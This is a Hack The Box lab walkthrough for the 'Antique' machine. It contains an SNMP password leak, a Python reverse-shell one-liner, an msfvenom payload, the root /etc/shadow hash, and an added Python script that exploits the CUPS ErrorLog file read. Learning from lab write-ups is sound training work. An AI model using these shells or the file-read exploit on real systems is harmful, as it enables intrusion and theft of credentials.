[HTB] Antique (SNMP information disclosure, arbitrary file read as a member of the lpadmin group)

Disclaimers

The host attacked in this article is a legally authorized target. The tools and methods used here are for learning and exchange only; do not use them, or the approach described, for any illegal purpose. I accept no responsibility for any consequences, misuse or damage.

Service detection

┌──(root💀kali)-[~/htb/Antique]
└─# nmap -sV -Pn 10.10.11.107
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
Nmap scan report for 10.10.11.107
Host is up (0.39s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds

A telnet service is open on port 23. Connect with nc to take a look:

┌──(root💀kali)-[~/htb/Antique]
└─# nc 10.10.11.107 23             

HP JetDirect

ls
Password: 123456
Invalid password

The banner reads HP JetDirect, which is HP's print-server product line.

Logging in over telnet requires a password but no username.

Searching Google for "HP JetDirect telnet" turns up This article

Following its section "Getting a JetDirect password remotely using the SNMP vulnerability", query the following OID with the default read community string public:

┌──(root💀kali)-[~/htb/Antique]
└─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

snmpget renders the value as a BITS type: the hex bytes are the password, and the decimal numbers that follow are only net-snmp's listing of the set bit positions, so they can be ignored. Decoding the hex bytes (with a hex-to-text website, or xxd -r -p) gives the password: P@ssw0rd@123!!123
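The split between password bytes and bit positions is easy to get wrong by eye, because the bit list also contains two-digit numbers such as 18 that look like hex octets. The following Python, added here as an example and not part of the original post, decodes a net-snmp BITS line by recomputing the set-bit positions from each candidate hex prefix and accepting the split that reproduces the trailing list exactly; the sample line is the snmpget output above, joined onto one line.

```python
import re
from typing import List

# The snmpget output from above, joined back onto one line (constructed from the page).
SAMPLE_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 "
    "1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 "
    "82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135"
)

HEX_OCTET = re.compile(r"[0-9A-Fa-f]{2}")


def set_bit_positions(data: bytes) -> List[int]:
    """net-snmp BITS convention: bit 0 is the most significant bit of the first octet."""
    return [i * 8 + b for i, octet in enumerate(data) for b in range(8) if octet & (0x80 >> b)]


def decode_bits_line(line: str) -> bytes:
    """Split a 'BITS: <hex octets> <set bit positions>' rendering into the raw octets.

    A token such as '18' is both a valid octet and a valid bit index, so the split is
    found by checking which hex prefix reproduces the trailing bit list exactly.
    """
    _, sep, rest = line.partition("BITS:")
    if not sep:
        raise ValueError("not a BITS value")
    tokens = rest.split()
    for n in range(len(tokens), 0, -1):          # longest hex prefix first
        head, tail = tokens[:n], tokens[n:]
        if not all(HEX_OCTET.fullmatch(t) for t in head):
            continue
        if not all(t.isdigit() for t in tail):
            continue
        data = bytes.fromhex("".join(head))
        if [int(t) for t in tail] == set_bit_positions(data):
            return data
    raise ValueError("hex octets and bit positions do not agree")


def jetdirect_password(line: str) -> str:
    """Decoded password, with any trailing NUL padding stripped."""
    return decode_bits_line(line).rstrip(b"\x00").decode("ascii")


if __name__ == "__main__":
    print(jetdirect_password(SAMPLE_LINE))   # prints P@ssw0rd@123!!123
```

The consistency check is what makes this safe to script: if an agent returns something that is not really a BITS rendering, the decoder raises instead of silently producing a wrong password.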

Log in over telnet with the credential above:

┌──(root💀kali)-[~/htb/Antique]
└─# nc 10.10.11.107 23

HP JetDirect


Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session
> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
> exec whoami
lp
/var/spool/lpd
> exec find / -name user.txt
/home/lp/user.txt
/var/spool/lpd/user.txt

Privilege escalation

Check the system information:

> exec uname -a
Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
> exec python3 --version
Python 3.8.10

Python 3 is installed, so use the following command (replace 10.10.14.15 with your own address) to spawn a more convenient reverse shell:

exec python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

┌──(root💀kali)-[~/htb/Antique]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
$ id
id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
$ 

The lpadmin group is the suspicious part and may be usable for privilege escalation. Googling turned up This article

It says:

members of lpadmin can read every file on server via cups

Members of this group can read any file on the system. Searching for a ready-made exploit turns up the Metasploit post module multi/escalate/cups_root_file_read, which abuses cupsctl to repoint the CUPS ErrorLog at the target file and then fetches it back through the CUPS web interface on localhost:631 (CVE-2012-5519; later CUPS releases moved the file-path directives into cups-files.conf, which cupsctl cannot change, but this target runs 1.6.1).
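To show what the module does under the hood, here is an added Python example (not the module's own code, and not from the original post) that reconstructs the file-read primitive: cupsctl repoints ErrorLog at the target file, the CUPS web interface on localhost:631 then serves that file as /admin/log/error_log, and ErrorLog is restored afterwards. The default log path /var/log/cups/error_log is an assumption about the target's distribution, and the run/fetch callables are injectable so the logic can be exercised without a CUPS daemon. It also handles the failure mode that appears later on this page: when the file cannot be opened, cupsd returns its own HTML "Not Found" page, which must not be mistaken for file contents.

```python
import http.client
import subprocess
from typing import Callable, Tuple

CUPS_HOST, CUPS_PORT = "localhost", 631
ERROR_LOG_URL = "/admin/log/error_log"        # CUPS serves its ErrorLog file here
DEFAULT_ERRORLOG = "/var/log/cups/error_log"  # assumed distro default, restored on cleanup


def is_cups_error_page(status: int, body: bytes) -> bool:
    """True when the response is cupsd's own 'Not Found' HTML rather than file content.

    cupsd answers this way when ErrorLog points at a file it cannot open.
    """
    if status == 404:
        return True
    head = body.lstrip()
    return head.startswith(b"<!DOCTYPE HTML") and b"Not Found - CUPS" in body


def run_cupsctl(directive: str) -> None:
    """Real runner: 'cupsctl Name=value' rewrites cupsd.conf over the local socket.

    cupsd only accepts this from a SystemGroup member, which is why lpadmin matters.
    """
    subprocess.run(["cupsctl", directive], check=True)


def fetch_error_log() -> Tuple[int, bytes]:
    """Real fetcher: plain HTTP GET against the CUPS web interface on localhost."""
    conn = http.client.HTTPConnection(CUPS_HOST, CUPS_PORT, timeout=10)
    try:
        conn.request("GET", ERROR_LOG_URL)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def read_file_via_cups(
    path: str,
    cupsctl: Callable[[str], None] = run_cupsctl,
    fetch: Callable[[], Tuple[int, bytes]] = fetch_error_log,
) -> bytes:
    """Read `path` with cupsd's (root) privileges by routing it through ErrorLog.

    Raises FileNotFoundError instead of handing back cupsd's 404 page as 'content'.
    """
    cupsctl(f"ErrorLog={path}")
    try:
        status, body = fetch()
    finally:
        cupsctl(f"ErrorLog={DEFAULT_ERRORLOG}")  # always put the log path back
    if is_cups_error_page(status, body):
        raise FileNotFoundError(f"cupsd could not serve {path} (HTTP {status})")
    return body


if __name__ == "__main__":
    # On a vulnerable host, run as an lpadmin member, this prints /etc/shadow.
    print(read_file_via_cups("/etc/shadow").decode(errors="replace"))
```

The prerequisites are the same ones the Metasploit module checks in its output below: membership in lpadmin, and cupsctl plus some local HTTP client on the box. Restoring ErrorLog in a finally block matters on a real engagement, because leaving cupsd logging into /etc/shadow is both noisy and destructive if the log is later rotated.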

First, generate a Meterpreter reverse-shell payload:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf

Transfer it to the target, run it, catch the session with multi/handler, then run the post module:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.15:4444 
[*] Sending stage (980808 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
[*] Cleaning up...
meterpreter > getuid

View the /etc/shadow file:

┌──(root💀kali)-[~/htb/Antique]
└─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::  

Edit it into a format john can read (passwd.txt holds the matching root line from /etc/passwd):

┌──(root💀kali)-[~/htb/Antique]
└─# cat shadow.txt
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::

┌──(root💀kali)-[~/htb/Antique]
└─# unshadow passwd.txt shadow.txt > unshadowed.txt

┌──(root💀kali)-[~/htb/Antique]
└─# cat unshadowed.txt
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash

But john could not crack the hash.

So a change of approach: maybe there is an id_rsa file under /root/.ssh.
Edit the msf module:

msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit

Change the target file on line 46 to /root/.ssh/id_rsa. (Check show options first: if the module exposes the file path as an option, setting it from the console avoids editing the source.)

Save the edit.

Run the module again to download the file:

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
[*] Cleaning up...

However, no such file exists. When ErrorLog points at a file cupsd cannot open, the CUPS web interface answers the request for the log with a 404, and the module saved that HTML error page as the loot, so always inspect what was downloaded before trusting it:

┌──(root💀kali)-[~]
└─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
        <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <TITLE>Not Found - CUPS v1.6.1</TITLE>
        <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
</HEAD>
<BODY>
<H1>Not Found</H1>
<P></P>
</BODY>
</HTML>   

In the end I simply read /root/root.txt the same way. It was past one in the morning, so that was the end of the session:

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
[*] Cleaning up...

Tags: penetration test

Posted on Wed, 01 Dec 2021 15:51:02 -0500 by ldougherty